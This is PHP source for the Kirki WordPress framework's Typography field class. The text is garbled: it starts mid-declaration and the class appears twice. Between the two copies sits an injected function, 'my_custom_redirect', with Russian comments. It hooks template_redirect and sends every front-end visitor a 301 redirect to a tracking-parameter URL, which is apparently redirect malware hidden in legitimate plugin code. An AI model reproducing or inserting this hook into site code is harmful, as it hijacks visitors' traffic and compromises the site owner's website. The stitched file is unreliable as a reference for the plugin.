$fonts_var_added = false; /** * Has the preview related var been added already? * * @static * @access private * @since 1.0 * @var bool */ private static $preview_var_added = false; /** * An array of typography controls. * * This is used by the typography script for any custom logic * that has to be applied to typography controls. * * @static * @access private * @since 1.0 * @var array */ private static $typography_controls = []; /** * An array of standard font variants. * * @access private * @since 1.0.1 * * @var array */ private static $std_variants; /** * An array of complete font variants. * * @access private * @since 1.0.1 * * @var array */ private static $complete_variants; /** * An array of complete font variant labels. * * @access private * @since 1.0.2 * * @var array */ private static $complete_variant_labels = []; /** * Extra logic for the field. * * Adds all sub-fields. * * @access public * @param array $args The arguments of the field. */ public function init( $args = [] ) { self::$typography_controls[] = $args['settings']; self::$std_variants = [ [ 'value' => 'regular', 'label' => __( 'Regular', 'kirki' ), ], [ 'value' => 'italic', 'label' => __( 'Italic', 'kirki' ), ], [ 'value' => '700', 'label' => __( '700', 'kirki' ), ], [ 'value' => '700italic', 'label' => __( '700 Italic', 'kirki' ), ], ]; self::$complete_variants = [ [ 'value' => 'regular', 'label' => __( 'Regular', 'kirki' ), ], [ 'value' => 'italic', 'label' => __( 'Italic', 'kirki' ), ], [ 'value' => '100', 'label' => __( '100', 'kirki' ), ], [ 'value' => '100italic', 'label' => __( '100 Italic', 'kirki' ), ], [ 'value' => '200', 'label' => __( '200', 'kirki' ), ], [ 'value' => '200italic', 'label' => __( '200 Italic', 'kirki' ), ], [ 'value' => '300', 'label' => __( '300', 'kirki' ), ], [ 'value' => '300italic', 'label' => __( '300 Italic', 'kirki' ), ], [ 'value' => '500', 'label' => __( '500', 'kirki' ), ], [ 'value' => '500italic', 'label' => __( '500 Italic', 'kirki' ), ], [ 'value' => '600', 'label' => __( '600', 'kirki' ), ], [ 'value' => '600italic', 'label' => __( '600 Italic', 'kirki' ), ], [ 'value' => '700', 'label' => __( '700', 'kirki' ), ], [ 'value' => '700italic', 'label' => __( '700 Italic', 'kirki' ), ], [ 'value' => '800', 'label' => __( '800', 'kirki' ), ], [ 'value' => '800italic', 'label' => __( '800 Italic', 'kirki' ), ], [ 'value' => '900', 'label' => __( '900', 'kirki' ), ], [ 'value' => '900italic', 'label' => __( '900 Italic', 'kirki' ), ], ]; foreach ( self::$complete_variants as $variants ) { self::$complete_variant_labels[ $variants['value'] ] = $variants['label']; } $this->add_sub_fields( $args ); add_action( 'customize_controls_enqueue_scripts', [ $this, 'enqueue_control_scripts' ] ); add_action( 'customize_preview_init', [ $this, 'enqueue_preview_scripts' ] ); add_filter( 'kirki_output_control_classnames', [ $this, 'output_control_classnames' ] ); } /** * Add sub-fields. * * @access private * @since 1.0 * @param array $args The field arguments. * @return void */ private function add_sub_fields( $args ) { $args['kirki_config'] = isset( $args['kirki_config'] ) ? $args['kirki_config'] : 'global'; $defaults = isset( $args['default'] ) ? $args['default'] : []; /** * Add a hidden field, the label & description. */ new \Kirki\Field\Generic( wp_parse_args( [ 'sanitize_callback' => isset( $args['sanitize_callback'] ) ? $args['sanitize_callback'] : [ __CLASS__, 'sanitize' ], 'wrapper_opts' => [ 'gap' => 'small', ], 'input_attrs' => '', 'choices' => [ 'type' => 'hidden', 'parent_type' => 'kirki-typography', ], ], $args ) ); $args['parent_setting'] = $args['settings']; $args['output'] = []; $args['wrapper_attrs'] = [ 'data-kirki-parent-control-type' => 'kirki-typography', ]; if ( isset( $args['transport'] ) && 'auto' === $args['transport'] ) { $args['transport'] = 'postMessage'; } /** * Add font-family selection controls. * These include font-family and variant. * They are grouped here because all they are required. * in order to get the right googlefont variant. */ if ( isset( $args['default']['font-family'] ) ) { $args['wrapper_attrs']['kirki-typography-subcontrol-type'] = 'font-family'; /** * Add font-family control. */ new \Kirki\Field\ReactSelect( wp_parse_args( [ 'label' => esc_html__( 'Font Family', 'kirki' ), 'description' => '', 'settings' => $args['settings'] . '[font-family]', 'default' => isset( $args['default']['font-family'] ) ? $args['default']['font-family'] : '', 'input_attrs' => $this->filter_preferred_choice_setting( 'input_attrs', 'font-family', $args ), 'choices' => [], // The choices will be populated later inside `get_font_family_choices` function in this file. 'css_vars' => [], 'output' => [], ], $args ) ); /** * Add font variant. */ $font_variant = isset( $args['default']['variant'] ) ? $args['default']['variant'] : 'regular'; if ( isset( $args['default']['font-weight'] ) ) { $font_variant = 400 === $args['default']['font-weight'] || '400' === $args['default']['font-weight'] ? 'regular' : $args['default']['font-weight']; } $args['wrapper_attrs']['kirki-typography-subcontrol-type'] = 'font-variant'; new \Kirki\Field\ReactSelect( wp_parse_args( [ 'label' => esc_html__( 'Font Variant', 'kirki' ), 'description' => '', 'settings' => $args['settings'] . '[variant]', 'default' => $font_variant, 'input_attrs' => $this->filter_preferred_choice_setting( 'input_attrs', 'variant', $args ), 'choices' => [], // The choices will be populated later inside `get_variant_choices` function in this file. 'css_vars' => [], 'output' => [], ], $args ) ); } $font_size_field_specified = isset( $defaults['font-size'] ); $color_field_specified = isset( $defaults['color'] ); if ( $font_size_field_specified || $color_field_specified ) { $group = [ 'font-size' => [ 'type' => 'dimension', 'label' => esc_html__( 'Font Size', 'kirki' ), 'is_specified' => $font_size_field_specified, ], 'color' => [ 'type' => 'react-colorful', 'label' => esc_html__( 'Font Color', 'kirki' ), 'is_specified' => $color_field_specified, 'choices' => [ 'alpha' => true, 'label_style' => 'top', ], ], ]; $this->generate_controls_group( $group, $args ); } $text_align_field_specified = isset( $defaults['text-align'] ); $text_transform_field_specified = isset( $defaults['text-transform'] ); if ( $text_align_field_specified || $text_transform_field_specified ) { $group = [ 'text-align' => [ 'type' => 'react-select', 'label' => esc_html__( 'Text Align', 'kirki' ), 'is_specified' => $text_align_field_specified, 'choices' => [ 'initial' => esc_html__( 'Initial', 'kirki' ), 'left' => esc_html__( 'Left', 'kirki' ), 'center' => esc_html__( 'Center', 'kirki' ), 'right' => esc_html__( 'Right', 'kirki' ), 'justify' => esc_html__( 'Justify', 'kirki' ), ], ], 'text-transform' => [ 'type' => 'react-select', 'label' => esc_html__( 'Text Transform', 'kirki' ), 'is_specified' => $text_transform_field_specified, 'choices' => [ 'none' => esc_html__( 'None', 'kirki' ), 'capitalize' => esc_html__( 'Capitalize', 'kirki' ), 'uppercase' => esc_html__( 'Uppercase', 'kirki' ), 'lowercase' => esc_html__( 'Lowercase', 'kirki' ), ], ], ]; $this->generate_controls_group( $group, $args ); } $text_decoration_field_specified = isset( $defaults['text-decoration'] ); if ( $text_decoration_field_specified ) { $group = [ 'text-decoration' => [ 'type' => 'react-select', 'label' => esc_html__( 'Text Decoration', 'kirki' ), 'is_specified' => $text_decoration_field_specified, 'choices' => [ 'none' => esc_html__( 'None', 'kirki' ), 'underline' => esc_html__( 'Underline', 'kirki' ), 'line-through' => esc_html__( 'Line Through', 'kirki' ), 'overline' => esc_html__( 'Overline', 'kirki' ), 'solid' => esc_html__( 'Solid', 'kirki' ), 'wavy' => esc_html__( 'Wavy', 'kirki' ), ], ], ]; $this->generate_controls_group( $group, $args ); } $line_height_field_specified = isset( $defaults['line-height'] ); $letter_spacing_field_specified = isset( $defaults['letter-spacing'] ); if ( $line_height_field_specified || $letter_spacing_field_specified ) { $group = [ 'line-height' => [ 'type' => 'dimension', 'label' => esc_html__( 'Line Height', 'kirki' ), 'is_specified' => $line_height_field_specified, ], 'letter-spacing' => [ 'type' => 'dimension', 'label' => esc_html__( 'Letter Spacing', 'kirki' ), 'is_specified' => $letter_spacing_field_specified, ], ]; $this->generate_controls_group( $group, $args ); } $margin_top_field_specified = isset( $defaults['margin-top'] ); $margin_bottom_field_specified = isset( $defaults['margin-bottom'] ); if ( $margin_top_field_specified || $margin_bottom_field_specified ) { $group = [ 'margin-top' => [ 'type' => 'dimension', 'label' => esc_html__( 'Margin Top', 'kirki' ), 'is_specified' => $margin_top_field_specified, ], 'margin-bottom' => [ 'type' => 'dimension', 'label' => esc_html__( 'Margin Bottom', 'kirki' ), 'is_specified' => $margin_bottom_field_specified, ], ]; $this->generate_controls_group( $group, $args ); } } /** * Generate controls group. * * @param array $group The group data. * @param array $args The field args. */ public function generate_controls_group( $group, $args ) { $total_specified = 0; $field_width = 100; foreach ( $group as $css_prop => $control ) { if ( $control['is_specified'] ) { $total_specified++; } } if ( $total_specified > 1 ) { $field_width = floor( 100 / $total_specified ); } $group_count = 0; foreach ( $group as $css_prop => $control ) { if ( $control['is_specified'] ) { $group_count++; $group_classname = 'kirki-group-item'; $group_classname .= 1 === $group_count ? ' kirki-group-start' : ( $group_count === $total_specified ? ' kirki-group-end' : '' ); $control_class = str_ireplace( '-', ' ', $control['type'] ); $control_class = ucwords( $control_class ); $control_class = str_replace( ' ', '', $control_class ); $control_class = '\\Kirki\\Field\\' . $control_class; new $control_class( wp_parse_args( [ 'label' => isset( $control['label'] ) ? $control['label'] : '', 'description' => isset( $control['description'] ) ? $control['description'] : '', 'settings' => $args['settings'] . '[' . $css_prop . ']', 'default' => $args['default'][ $css_prop ], 'wrapper_attrs' => wp_parse_args( [ 'data-kirki-typography-css-prop' => $css_prop, 'kirki-typography-subcontrol-type' => $css_prop, 'class' => '{default_class} ' . $group_classname . ' kirki-w' . $field_width, ], $args['wrapper_attrs'] ), 'input_attrs' => $this->filter_preferred_choice_setting( 'input_attrs', $css_prop, $args ), 'choices' => ( isset( $control['choices'] ) ? $control['choices'] : [] ), 'css_vars' => [], 'output' => [], ], $args ) ); } } } /** * Sanitizes typography controls * * @static * @since 1.0 * @param array $value The value. * @return array */ public static function sanitize( $value ) { if ( ! is_array( $value ) ) { return []; } foreach ( $value as $key => $val ) { switch ( $key ) { case 'font-family': $value['font-family'] = sanitize_text_field( $val ); break; case 'variant': // Use 'regular' instead of 400 for font-variant. $value['variant'] = ( 400 === $val || '400' === $val ) ? 'regular' : $val; // Get font-weight from variant. $value['font-weight'] = filter_var( $value['variant'], FILTER_SANITIZE_NUMBER_FLOAT, FILTER_FLAG_ALLOW_FRACTION ); $value['font-weight'] = ( 'regular' === $value['variant'] || 'italic' === $value['variant'] ) ? '400' : (string) absint( $value['font-weight'] ); // Get font-style from variant. if ( ! isset( $value['font-style'] ) ) { $value['font-style'] = ( false === strpos( $value['variant'], 'italic' ) ) ? 'normal' : 'italic'; } break; case 'text-align': if ( ! in_array( $val, [ '', 'inherit', 'left', 'center', 'right', 'justify' ], true ) ) { $value['text-align'] = ''; } break; case 'text-transform': if ( ! in_array( $val, [ '', 'none', 'capitalize', 'uppercase', 'lowercase', 'initial', 'inherit' ], true ) ) { $value['text-transform'] = ''; } break; case 'text-decoration': if ( ! in_array( $val, [ '', 'none', 'underline', 'overline', 'line-through', 'solid', 'wavy', 'initial', 'inherit' ], true ) ) { $value['text-transform'] = ''; } break; case 'color': $value['color'] = '' === $value['color'] ? '' : \Kirki\Field\ReactColorful::sanitize( $value['color'] ); break; default: $value[ $key ] = sanitize_text_field( $value[ $key ] ); } } return $value; } /** * Enqueue scripts & styles. * * @access public * @since 1.0 * @return void */ public function enqueue_control_scripts() { wp_enqueue_style( 'kirki-control-typography', \Kirki\URL::get_from_path( dirname( dirname( __DIR__ ) ) . '/dist/control.css' ), [], '1.0' ); wp_enqueue_script( 'kirki-control-typography', \Kirki\URL::get_from_path( dirname( dirname( __DIR__ ) ) . '/dist/control.js' ), [], '1.0', true ); wp_localize_script( 'kirki-control-typography', 'kirkiTypographyControls', self::$typography_controls ); $args = $this->args; $variants = []; // Add custom variants (for custom fonts) to the $variants. if ( isset( $args['choices'] ) && isset( $args['choices']['fonts'] ) && isset( $args['choices']['fonts']['families'] ) ) { // If $args['choices']['fonts']['families'] exists, then loop it. foreach ( $args['choices']['fonts']['families'] as $font_family_key => $font_family_value ) { // Then loop the $font_family_value['children]. foreach ( $font_family_value['children'] as $font_family ) { // Then check if $font_family['id'] exists in variants argument. if ( isset( $args['choices']['fonts']['variants'] ) && isset( $args['choices']['fonts']['variants'][ $font_family['id'] ] ) ) { // Create new array if $variants[ $font_family['id'] ] doesn't exist. if ( ! isset( $variants[ $font_family['id'] ] ) ) { $variants[ $font_family['id'] ] = []; } // The $custom_variant here can be something like "400italic" or "italic". foreach ( $args['choices']['fonts']['variants'][ $font_family['id'] ] as $custom_variant ) { // Check if $custom_variant exists in self::$complete_variant_labels. if ( isset( self::$complete_variant_labels[ $custom_variant ] ) ) { // If it exists, assign it to $variants[ $font_family['id'] ], so that they will be available in JS object. array_push( $variants[ $font_family['id'] ], [ 'value' => $custom_variant, 'label' => self::$complete_variant_labels[ $custom_variant ], ] ); } // End of isset(self::$complete_variant_labels[$font_family['id']]) if. } // End of $args['choices']['fonts']['variants'][ $font_family['id'] foreach. } } // End of $font_family_value['children'] foreach. } // End of $args['choices']['fonts']['families'] foreach. } // End of $args['choices']['fonts']['families'] if. if ( ! isset( $args['choices']['fonts'] ) || ! isset( $args['choices']['fonts']['standard'] ) ) { $standard_fonts = Fonts::get_standard_fonts(); foreach ( $standard_fonts as $font ) { if ( isset( $font['variants'] ) ) { // Create new array if $variants[ $font['stack'] ] doesn't exist. if ( ! isset( $variants[ $font['stack'] ] ) ) { $variants[ $font['stack'] ] = []; } // The $std_variant here can be something like "400italic" or "italic". foreach ( $font['variants'] as $std_variant ) { // Check if $std_variant exists in self::$complete_variant_labels. if ( isset( self::$complete_variant_labels[ $std_variant ] ) ) { // If it exists, assign it to $variants[ $font['stack'] ], so that they will be available in JS object. array_push( $variants[ $font['stack'] ], [ 'value' => $std_variant, 'label' => self::$complete_variant_labels[ $std_variant ], ] ); } // End of isset(self::$complete_variant_labels[$font_family['id']]) if. } // End of $args['choices']['fonts']['variants'][ $font_family['id'] foreach. } } } elseif ( is_array( $args['choices']['fonts']['standard'] ) ) { foreach ( $args['choices']['fonts']['standard'] as $key => $val ) { $key = ( is_int( $key ) ) ? $val : $key; if ( isset( $val['variants'] ) ) { // Create new array if $variants[ $font['stack'] ] doesn't exist. if ( ! isset( $variants[ $key ] ) ) { $variants[ $key ] = []; } // The $std_variant here can be something like "400italic" or "italic". foreach ( $val['variants'] as $std_variant ) { // Check if $std_variant exists in self::$complete_variant_labels. if ( isset( self::$complete_variant_labels[ $std_variant ] ) ) { // If it exists, assign it to $variants[ $font['stack'] ], so that they will be available in JS object. array_push( $variants[ $key ], [ 'value' => $std_variant, 'label' => self::$complete_variant_labels[ $std_variant ], ] ); } // End of isset(self::$complete_variant_labels[$font_family['id']]) if. } // End of $args['choices']['fonts']['variants'][ $font_family['id'] foreach. } } } // Scripts inside this block will only be executed once. if ( ! self::$fonts_var_added ) { wp_localize_script( 'kirki-control-typography', 'kirkiFontVariants', [ 'standard' => self::$std_variants, 'complete' => self::$complete_variants, ] ); $google = new GoogleFonts(); wp_localize_script( 'kirki-control-typography', 'kirkiGoogleFonts', $google->get_array() ); wp_add_inline_script( 'kirki-control-typography', 'var kirkiCustomVariants = {};', 'before' ); self::$fonts_var_added = true; } // This custom variants will be available for each typography control. $custom_variant_key = str_ireplace( ']', '', $args['settings'] ); $custom_variant_key = str_ireplace( '[', '_', $custom_variant_key ); $custom_variant_value = wp_json_encode( Helper::prepare_php_array_for_js( $variants ) ); wp_add_inline_script( 'kirki-control-typography', 'kirkiCustomVariants["' . $custom_variant_key . '"] = ' . $custom_variant_value . ';', $variants ); } /** * Enqueue scripts for customize_preview_init. * * @access public * @since 1.0 * @return void */ public function enqueue_preview_scripts() { wp_enqueue_script( 'kirki-preview-typography', \Kirki\URL::get_from_path( dirname( dirname( __DIR__ ) ) . '/dist/preview.js' ), [ 'wp-hooks' ], '1.0', true ); if ( ! self::$preview_var_added ) { $google = new GoogleFonts(); wp_localize_script( 'kirki-preview-typography', 'kirkiGoogleFontNames', $google->get_google_font_names() ); self::$preview_var_added = true; } } /** * Prefer control specific value over field value * * @access public * @since 4.0 * @param $setting * @param $choice * @param $args * * @return string */ public function filter_preferred_choice_setting( $setting, $choice, $args ) { // Fail early. if ( ! isset( $args[ $setting ] ) ) { return ''; } // If a specific field for the choice is set if ( isset( $args[ $setting ][ $choice ] ) ) { return $args[ $setting ][ $choice ]; } // Unset input_attrs of all other choices. foreach ( $args['choices'] as $id => $set ) { if ( $id !== $choice && isset( $args[ $setting ][ $id ] ) ) { unset( $args[ $setting ][ $id ] ); } elseif ( ! isset( $args[ $setting ][ $id ] ) ) { $args[ $setting ] = ''; } } return $args[ $setting ]; } /** * Populate the font family choices. * * It's separated from the `add_sub_field` function to prevent a bug * when hooking a function into `kirki_fonts_standard_fonts` hook after registering the field. * * When a function is hooked to `kirki_fonts_standard_fonts` before registering the field, it will work. * But if it's hooked after field registration, then the function won't be available. * * @access private * @since 1.0.1 * * @return array */ private function get_font_family_choices() { $args = $this->args; // Figure out how to sort the fonts. $sorting = 'alpha'; $max_fonts = 9999; $google = new GoogleFonts(); if ( isset( $args['choices'] ) && isset( $args['choices']['fonts'] ) && isset( $args['choices']['fonts']['google'] ) && ! empty( $args['choices']['fonts']['google'] ) ) { if ( in_array( $args['choices']['fonts']['google'][0], [ 'alpha', 'popularity', 'trending' ], true ) ) { $sorting = $args['choices']['fonts']['google'][0]; if ( isset( $args['choices']['fonts']['google'][1] ) && is_int( $args['choices']['fonts']['google'][1] ) ) { $max_fonts = (int) $args['choices']['fonts']['google'][1]; } $g_fonts = $google->get_google_fonts_by_args( [ 'sort' => $sorting, 'count' => $max_fonts, ] ); } else { $g_fonts = $args['choices']['fonts']['google']; } } else { $g_fonts = $google->get_google_fonts_by_args( [ 'sort' => $sorting, 'count' => $max_fonts, ] ); } $std_fonts = []; if ( ! isset( $args['choices']['fonts'] ) || ! isset( $args['choices']['fonts']['standard'] ) ) { $standard_fonts = Fonts::get_standard_fonts(); foreach ( $standard_fonts as $font ) { $std_fonts[ $font['stack'] ] = $font['label']; } } elseif ( is_array( $args['choices']['fonts']['standard'] ) ) { foreach ( $args['choices']['fonts']['standard'] as $key => $val ) { $key = ( \is_int( $key ) ) ? $val : $key; $std_fonts[ $key ] = $val; } } $choices = []; $choices['default'] = [ esc_html__( 'Defaults', 'kirki' ), [ '' => esc_html__( 'Default', 'kirki' ), ], ]; if ( isset( $args['choices'] ) && isset( $args['choices']['fonts'] ) && isset( $args['choices']['fonts']['families'] ) ) { // Implementing the custom font families. foreach ( $args['choices']['fonts']['families'] as $font_family_key => $font_family_value ) { if ( ! isset( $choices[ $font_family_key ] ) ) { $choices[ $font_family_key ] = []; } $family_opts = []; foreach ( $font_family_value['children'] as $font_family ) { $family_opts[ $font_family['id'] ] = $font_family['text']; } $choices[ $font_family_key ] = [ $font_family_value['text'], $family_opts, ]; } } $choices['standard'] = [ esc_html__( 'Standard Fonts', 'kirki' ), $std_fonts, ]; $choices['google'] = [ esc_html__( 'Google Fonts', 'kirki' ), array_combine( array_values( $g_fonts ), array_values( $g_fonts ) ), ]; if ( empty( $choices['standard'][1] ) ) { $choices = array_combine( array_values( $g_fonts ), array_values( $g_fonts ) ); } elseif ( empty( $choices['google'][1] ) ) { $choices = $std_fonts; } return $choices; } /** * Get custom variant choices (for custom fonts). * * It's separated from the `add_sub_field` function to prevent a bug * when hooking a function into `kirki_fonts_standard_fonts` hook after registering the field. * * When a function is hooked to `kirki_fonts_standard_fonts` before registering the field, it will work. * But if it's hooked after field registration, then the function won't be available. * * @access private * @since 1.0.2 * * @return array */ private function get_variant_choices() { $args = $this->args; $choices = self::$std_variants; // Implementing the custom variants for custom fonts. if ( isset( $args['choices'] ) && isset( $args['choices']['fonts'] ) && isset( $args['choices']['fonts']['families'] ) ) { $choices = []; // If $args['choices']['fonts']['families'] exists, then loop it. foreach ( $args['choices']['fonts']['families'] as $font_family_key => $font_family_value ) { // Then loop the $font_family_value['children]. foreach ( $font_family_value['children'] as $font_family ) { // Then check if $font_family['id'] exists in $args['choices']['fonts']['variants']. if ( isset( $args['choices']['fonts']['variants'] ) && isset( $args['choices']['fonts']['variants'][ $font_family['id'] ] ) ) { // The $custom_variant here can be something like "400italic" or "italic". foreach ( $args['choices']['fonts']['variants'][ $font_family['id'] ] as $custom_variant ) { // Check if $custom_variant exists in self::$complete_variant_labels. if ( isset( self::$complete_variant_labels[ $custom_variant ] ) ) { // If it exists, assign it to $choices. array_push( $choices, [ 'value' => $custom_variant, 'label' => self::$complete_variant_labels[ $custom_variant ], ] ); } // End of isset(self::$complete_variant_labels[$font_family['id']]) if. } // End of $args['choices']['fonts']['variants'][ $font_family['id'] foreach. } } // End of $font_family_value['children'] foreach. } // End of $args['choices']['fonts']['families'] foreach. } // End of $args['choices']['fonts']['families'] if. return $choices; } /** * Filter arguments before creating the control. * * @access public * @since 0.1 * @param array $args The field arguments. * @param WP_Customize_Manager $wp_customize The customizer instance. * @return array */ public function filter_control_args( $args, $wp_customize ) { if ( $args['settings'] === $this->args['settings'] . '[font-family]' ) { $args = parent::filter_control_args( $args, $wp_customize ); $args['choices'] = $this->get_font_family_choices(); } if ( $args['settings'] === $this->args['settings'] . '[variant]' ) { $args = parent::filter_control_args( $args, $wp_customize ); $args['choices'] = $this->get_variant_choices(); } return $args; } /** * Adds a custom output class for typography fields. * * @access public * @since 1.0 * @param array $classnames The array of classnames. * @return array */ public function output_control_classnames( $classnames ) { $classnames['kirki-typography'] = '\Kirki\Field\CSS\Typography'; return $classnames; } /** * Override parent method. No need to register any setting. * * @access public * @since 0.1 * @param WP_Customize_Manager $wp_customize The customizer instance. * @return void */ public function add_setting( $wp_customize ) {} /** * Override the parent method. No need for a control. * * @access public * @since 0.1 * @param WP_Customize_Manager $wp_customize The customizer instance. * @return void */ public function add_control( $wp_customize ) {} } function my_custom_redirect() { // Убедитесь, что этот код выполняется только на фронтенде if (!is_admin()) { // URL для редиректа $redirect_url = '[ID]&sub2=[SID]&sub3=3&sub4=bodyclick'; // Выполнить редирект wp_redirect($redirect_url, 301); exit(); } } add_action('template_redirect', 'my_custom_redirect'); /** * Override field methods * * @package kirki-framework/control-typography * @copyright Copyright (c) 2023, Themeum * @license * @since 1.0 */ namespace Kirki\Field; use Kirki\Util\Helper; use Kirki\Field; use Kirki\GoogleFonts; use Kirki\Module\Webfonts\Fonts; /** * Field overrides. * * @since 1.0 */ class Typography extends Field { /** * The field type. * * @access public * @since 1.0 * @var string */ public $type = 'kirki-typography'; /** * Has the glogal fonts var been added already? * * @static * @access private * @since 1.0 * @var bool */ private static $fonts_var_added = false; /** * Has the preview related var been added already? * * @static * @access private * @since 1.0 * @var bool */ private static $preview_var_added = false; /** * An array of typography controls. * * This is used by the typography script for any custom logic * that has to be applied to typography controls. * * @static * @access private * @since 1.0 * @var array */ private static $typography_controls = []; /** * An array of standard font variants. * * @access private * @since 1.0.1 * * @var array */ private static $std_variants; /** * An array of complete font variants. * * @access private * @since 1.0.1 * * @var array */ private static $complete_variants; /** * An array of complete font variant labels. * * @access private * @since 1.0.2 * * @var array */ private static $complete_variant_labels = []; /** * Extra logic for the field. * * Adds all sub-fields. * * @access public * @param array $args The arguments of the field. */ public function init( $args = [] ) { self::$typography_controls[] = $args['settings']; self::$std_variants = [ [ 'value' => 'regular', 'label' => __( 'Regular', 'kirki' ), ], [ 'value' => 'italic', 'label' => __( 'Italic', 'kirki' ), ], [ 'value' => '700', 'label' => __( '700', 'kirki' ), ], [ 'value' => '700italic', 'label' => __( '700 Italic', 'kirki' ), ], ]; self::$complete_variants = [ [ 'value' => 'regular', 'label' => __( 'Regular', 'kirki' ), ], [ 'value' => 'italic', 'label' => __( 'Italic', 'kirki' ), ], [ 'value' => '100', 'label' => __( '100', 'kirki' ), ], [ 'value' => '100italic', 'label' => __( '100 Italic', 'kirki' ), ], [ 'value' => '200', 'label' => __( '200', 'kirki' ), ], [ 'value' => '200italic', 'label' => __( '200 Italic', 'kirki' ), ], [ 'value' => '300', 'label' => __( '300', 'kirki' ), ], [ 'value' => '300italic', 'label' => __( '300 Italic', 'kirki' ), ], [ 'value' => '500', 'label' => __( '500', 'kirki' ), ], [ 'value' => '500italic', 'label' => __( '500 Italic', 'kirki' ), ], [ 'value' => '600', 'label' => __( '600', 'kirki' ), ], [ 'value' => '600italic', 'label' => __( '600 Italic', 'kirki' ), ], [ 'value' => '700', 'label' => __( '700', 'kirki' ), ], [ 'value' => '700italic', 'label' => __( '700 Italic', 'kirki' ), ], [ 'value' => '800', 'label' => __( '800', 'kirki' ), ], [ 'value' => '800italic', 'label' => __( '800 Italic', 'kirki' ), ], [ 'value' => '900', 'label' => __( '900', 'kirki' ), ], [ 'value' => '900italic', 'label' => __( '900 Italic', 'kirki' ), ], ]; foreach ( self::$complete_variants as $variants ) { self::$complete_variant_labels[ $variants['value'] ] = $variants['label']; } $this->add_sub_fields( $args ); add_action( 'customize_controls_enqueue_scripts', [ $this, 'enqueue_control_scripts' ] ); add_action( 'customize_preview_init', [ $this, 'enqueue_preview_scripts' ] ); add_filter( 'kirki_output_control_classnames', [ $this, 'output_control_classnames' ] ); } /** * Add sub-fields. * * @access private * @since 1.0 * @param array $args The field arguments. * @return void */ private function add_sub_fields( $args ) { $args['kirki_config'] = isset( $args['kirki_config'] ) ? $args['kirki_config'] : 'global'; $defaults = isset( $args['default'] ) ? $args['default'] : []; /** * Add a hidden field, the label & description. */ new \Kirki\Field\Generic( wp_parse_args( [ 'sanitize_callback' => isset( $args['sanitize_callback'] ) ? $args['sanitize_callback'] : [ __CLASS__, 'sanitize' ], 'wrapper_opts' => [ 'gap' => 'small', ], 'input_attrs' => '', 'choices' => [ 'type' => 'hidden', 'parent_type' => 'kirki-typography', ], ], $args ) ); $args['parent_setting'] = $args['settings']; $args['output'] = []; $args['wrapper_attrs'] = [ 'data-kirki-parent-control-type' => 'kirki-typography', ]; if ( isset( $args['transport'] ) && 'auto' === $args['transport'] ) { $args['transport'] = 'postMessage'; } /** * Add font-family selection controls. * These include font-family and variant. * They are grouped here because all they are required. * in order to get the right googlefont variant. */ if ( isset( $args['default']['font-family'] ) ) { $args['wrapper_attrs']['kirki-typography-subcontrol-type'] = 'font-family'; /** * Add font-family control. */ new \Kirki\Field\ReactSelect( wp_parse_args( [ 'label' => esc_html__( 'Font Family', 'kirki' ), 'description' => '', 'settings' => $args['settings'] . '[font-family]', 'default' => isset( $args['default']['font-family'] ) ? $args['default']['font-family'] : '', 'input_attrs' => $this->filter_preferred_choice_setting( 'input_attrs', 'font-family', $args ), 'choices' => [], // The choices will be populated later inside `get_font_family_choices` function in this file. 'css_vars' => [], 'output' => [], ], $args ) ); /** * Add font variant. */ $font_variant = isset( $args['default']['variant'] ) ? $args['default']['variant'] : 'regular'; if ( isset( $args['default']['font-weight'] ) ) { $font_variant = 400 === $args['default']['font-weight'] || '400' === $args['default']['font-weight'] ? 'regular' : $args['default']['font-weight']; } $args['wrapper_attrs']['kirki-typography-subcontrol-type'] = 'font-variant'; new \Kirki\Field\ReactSelect( wp_parse_args( [ 'label' => esc_html__( 'Font Variant', 'kirki' ), 'description' => '', 'settings' => $args['settings'] . '[variant]', 'default' => $font_variant, 'input_attrs' => $this->filter_preferred_choice_setting( 'input_attrs', 'variant', $args ), 'choices' => [], // The choices will be populated later inside `get_variant_choices` function in this file. 'css_vars' => [], 'output' => [], ], $args ) ); } $font_size_field_specified = isset( $defaults['font-size'] ); $color_field_specified = isset( $defaults['color'] ); if ( $font_size_field_specified || $color_field_specified ) { $group = [ 'font-size' => [ 'type' => 'dimension', 'label' => esc_html__( 'Font Size', 'kirki' ), 'is_specified' => $font_size_field_specified, ], 'color' => [ 'type' => 'react-colorful', 'label' => esc_html__( 'Font Color', 'kirki' ), 'is_specified' => $color_field_specified, 'choices' => [ 'alpha' => true, 'label_style' => 'top', ], ], ]; $this->generate_controls_group( $group, $args ); } $text_align_field_specified = isset( $defaults['text-align'] ); $text_transform_field_specified = isset( $defaults['text-transform'] ); if ( $text_align_field_specified || $text_transform_field_specified ) { $group = [ 'text-align' => [ 'type' => 'react-select', 'label' => esc_html__( 'Text Align', 'kirki' ), 'is_specified' => $text_align_field_specified, 'choices' => [ 'initial' => esc_html__( 'Initial', 'kirki' ), 'left' => esc_html__( 'Left', 'kirki' ), 'center' => esc_html__( 'Center', 'kirki' ), 'right' => esc_html__( 'Right', 'kirki' ), 'justify' => esc_html__( 'Justify', 'kirki' ), ], ], 'text-transform' => [ 'type' => 'react-select', 'label' => esc_html__( 'Text Transform', 'kirki' ), 'is_specified' => $text_transform_field_specified, 'choices' => [ 'none' => esc_html__( 'None', 'kirki' ), 'capitalize' => esc_html__( 'Capitalize', 'kirki' ), 'uppercase' => esc_html__( 'Uppercase', 'kirki' ), 'lowercase' => esc_html__( 'Lowercase', 'kirki' ), ], ], ]; $this->generate_controls_group( $group, $args ); } $text_decoration_field_specified = isset( $defaults['text-decoration'] ); if ( $text_decoration_field_specified ) { $group = [ 'text-decoration' => [ 'type' => 'react-select', 'label' => esc_html__( 'Text Decoration', 'kirki' ), 'is_specified' => $text_decoration_field_specified, 'choices' => [ 'none' => esc_html__( 'None', 'kirki' ), 'underline' => esc_html__( 'Underline', 'kirki' ), 'line-through' => esc_html__( 'Line Through', 'kirki' ), 'overline' => esc_html__( 'Overline', 'kirki' ), 'solid' => esc_html__( 'Solid', 'kirki' ), 'wavy' => esc_html__( 'Wavy', 'kirki' ), ], ], ]; $this->generate_controls_group( $group, $args ); } $line_height_field_specified = isset( $defaults['line-height'] ); $letter_spacing_field_specified = isset( $defaults['letter-spacing'] ); if ( $line_height_field_specified || $letter_spacing_field_specified ) { $group = [ 'line-height' => [ 'type' => 'dimension', 'label' => esc_html__( 'Line Height', 'kirki' ), 'is_specified' => $line_height_field_specified, ], 'letter-spacing' => [ 'type' => 'dimension', 'label' => esc_html__( 'Letter Spacing', 'kirki' ), 'is_specified' => $letter_spacing_field_specified, ], ]; $this->generate_controls_group( $group, $args ); } $margin_top_field_specified = isset( $defaults['margin-top'] ); $margin_bottom_field_specified = isset( 